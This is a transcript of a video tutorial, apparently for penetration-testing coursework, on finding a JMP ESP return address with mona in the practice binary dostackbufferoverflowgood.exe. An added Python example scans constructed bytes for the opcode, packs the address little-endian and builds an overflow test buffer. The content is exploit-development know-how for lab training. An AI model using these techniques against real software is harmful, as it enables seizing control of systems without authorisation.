Finding a Return Address
Our learning objective is to understand how to find a return address.
So what I mean by this: ultimately we want to write shellcode so that when we do our buffer overflow, the program jumps into our shellcode. Well, as the name sounds, we need to find a JMP ESP return address where we can consistently have the program jump into our shellcode, so we can consistently get a shell.
What some programmers do is they have protections against buffer overflow attacks, like ASLR. So what we want to do is try to find modules within the program that do not have these types of protections, so that we can consistently, over and over again, jump into our shellcode with the JMP ESP instruction by finding a memory location that won't change every time.
So we can do that with mona. So what I'll do now is I'll do !mona, and as you can see here, these are our modules. And we're going to look for "False", because everything that's "True" means that flag, that protection, is on. And one of these, we see, has the most "False" in them, which is dostackbufferoverflowgood.exe.
So the PWK / PEN-200 materials do a great job of explaining this, and they use the msf nasm_shell module. But we're trying to find the opcode, or hex, for JMP ESP.
Now, what they find, or what we have for JMP ESP, is FF E4.
So keeping that in mind, we're going to use mona, and we're going to do !mona find, and here's the JMP ESP instruction.
Sorry, my microphone slipped there.
Now we're going to do dostackbufferoverflowgood.exe, so it's going to find our memory locations with JMP ESP instructions, and we see we found two: 080414C3 and 080416BF. You can choose either. I chose the first one.
But what we're going to do now is set a breakpoint at that memory location. So keep that in mind.
And we're going to go to this address, and we already have it here: 080414C3.
And I'm going to say this is a breakpoint. You can see I already did. But to toggle this you press F2; you might get the suspicious breakpoint warning.
But now I'm going to go back to Kali, and you'll see where I changed, or where I wrote, my Python script, and how I changed it.
Keep in mind, if you're having issues, if you're seeing "permission denied" when you write your script: chmod +x. You can chmod it 777. But that might be a reason why you're having issues executing your scripts.
If we look here, we have our A's; instead of our B's, I'm replacing them with this memory location. You can see my comment here, but I'm doing it in little-endian format, so I'm writing it backwards. So 08, 04, 14, C3. So that's our memory location. So we're having it go to the JMP ESP instruction, and then hopefully we move into our C's here.
So let's verify that. That's why I set that breakpoint at the memory location here.
And what we'll do is we will send this program. I'm sorry, send the script.
And it should hit our breakpoint. Here, we see it did. So now I press F7 to step through, and we should see it land in our C's.
And you can see 43 43. It did land in our C's.
So we verified that JMP ESP instruction. And now the only thing left to do is write our shellcode so we can get a shell on this box.
So in summary, we should now understand how to find a return address.
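As an added example, not code from the video, here are the three mechanics walked through above in Python: scanning a module image for the FF E4 opcode bytes (what !mona find does), packing the chosen address in little-endian form (the "writing it backwards" step), and laying out the A's / return address / C's test buffer. The module bytes, base address, bad-character list and the 146-byte offset are all constructed or placeholder values for this example; the addresses were picked so the hits match the two the video reports.

```python
import struct

# Opcode bytes of the x86 JMP ESP instruction, as used in the !mona find step.
JMP_ESP = b"\xff\xe4"

# Constructed stand-in for a module image: 0x800 bytes of NOPs with JMP ESP
# planted at two offsets. The base address is chosen so that the two hits land
# on the same addresses the video reports (080414C3 and 080416BF).
SAMPLE_BASE = 0x08041000
_img = bytearray(b"\x90" * 0x800)
_img[0x4C3:0x4C5] = JMP_ESP
_img[0x6BF:0x6C1] = JMP_ESP
SAMPLE_MODULE = bytes(_img)

def find_jmp_esp(module_bytes: bytes, base_addr: int) -> list:
    """Return every virtual address at which FF E4 occurs in module_bytes
    (a module without ASLR keeps its base, so these addresses stay stable)."""
    hits, start = [], 0
    while True:
        idx = module_bytes.find(JMP_ESP, start)
        if idx == -1:
            return hits
        hits.append(base_addr + idx)
        start = idx + 1

def little_endian(addr: int) -> bytes:
    """Pack a 32-bit address the way it must be written into the buffer:
    0x080414C3 becomes the bytes C3 14 04 08 ("writing it backwards")."""
    return struct.pack("<I", addr)

def usable_address(addr: int, bad_chars: bytes) -> bool:
    """Reject a candidate if any byte of its little-endian form is a bad
    character the target would mangle (NUL is the usual one)."""
    return not any(b in bad_chars for b in little_endian(addr))

def build_buffer(offset: int, ret_addr: int, c_count: int) -> bytes:
    """A's up to the saved return address, the JMP ESP address in place of
    the four B's, then C's: after the return, ESP points at the C's, so
    JMP ESP lands execution there (the 43 43 seen in the debugger)."""
    return b"A" * offset + little_endian(ret_addr) + b"C" * c_count

if __name__ == "__main__":
    OFFSET = 146          # placeholder: the distance to EIP found in an earlier step
    BAD_CHARS = b"\x00"   # constructed bad-character list for this example
    for addr in find_jmp_esp(SAMPLE_MODULE, SAMPLE_BASE):
        print(f"JMP ESP at 0x{addr:08X} usable={usable_address(addr, BAD_CHARS)}")
    print(build_buffer(OFFSET, 0x080414C3, 8))
```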